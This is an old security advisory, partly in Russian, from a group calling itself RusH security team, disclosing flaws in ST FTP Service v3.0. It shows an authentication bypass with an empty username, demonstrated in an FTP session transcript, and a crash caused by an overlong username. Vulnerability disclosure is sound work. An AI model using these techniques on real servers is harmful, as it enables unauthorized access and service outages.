__________               ___ ___  
\______   \__ __  ______/   |   \ 
 |       _/  |  \/  ___/    _    \
 |    |   \  |  /\___ \\         /
 |____|_  /____//____  >\___|_  / 
 -======\/==security=\/=team==\/

Advisory#8 
 
Product: ST FTP Service v3.0
Author: http://stsoft.newmail.ru
Vuln: Unauthorized access, DOS
Bug found: 14.05.2003 by 1dt.w0lf

ST FTP Service - ftp server для win98,NT
Поддерживает основной набор FTP-команд, докачку в оба направления, идентификацию и аутентификацию пользователей, 
анонимные подключения. Возможна настройка рабочих каталогов и прав доступа для каждого пользователя в отдельности. 
Сервер может работать как обычная программа для Win9x и NT (STFTP.EXE), а также как служба WinNT (STFTPSrv.EXE). 
Имеется возможность удаленного администрирования. 

1.Unauthorized access
---------------------
Даже если в настройках программы отключена возможность анонимного подключения, мы можем получить доступ к фтп.
Способ обхода аутентификации заключается в использовании вместо логина пустой строки:

>ftp 127.0.0.1
Связь с 127.0.0.1.
220- welcome...
Пользователь (127.0.0.1:(none)): anonymous
530 anonymous not logged in.
Подключение разорвано удаленным узлом.

>ftp 127.0.0.1
Связь с 127.0.0.1.
220- welcome...
Пользователь (127.0.0.1:(none)):
230 User logged in, proceed.
ftp> pwd
257 "/" is working directory.
ftp> 

2. D.O.S. =)
------------
Если в качестве имени пользователя передать более 253 символов мусора то фтп-сервер благополучно скончается =)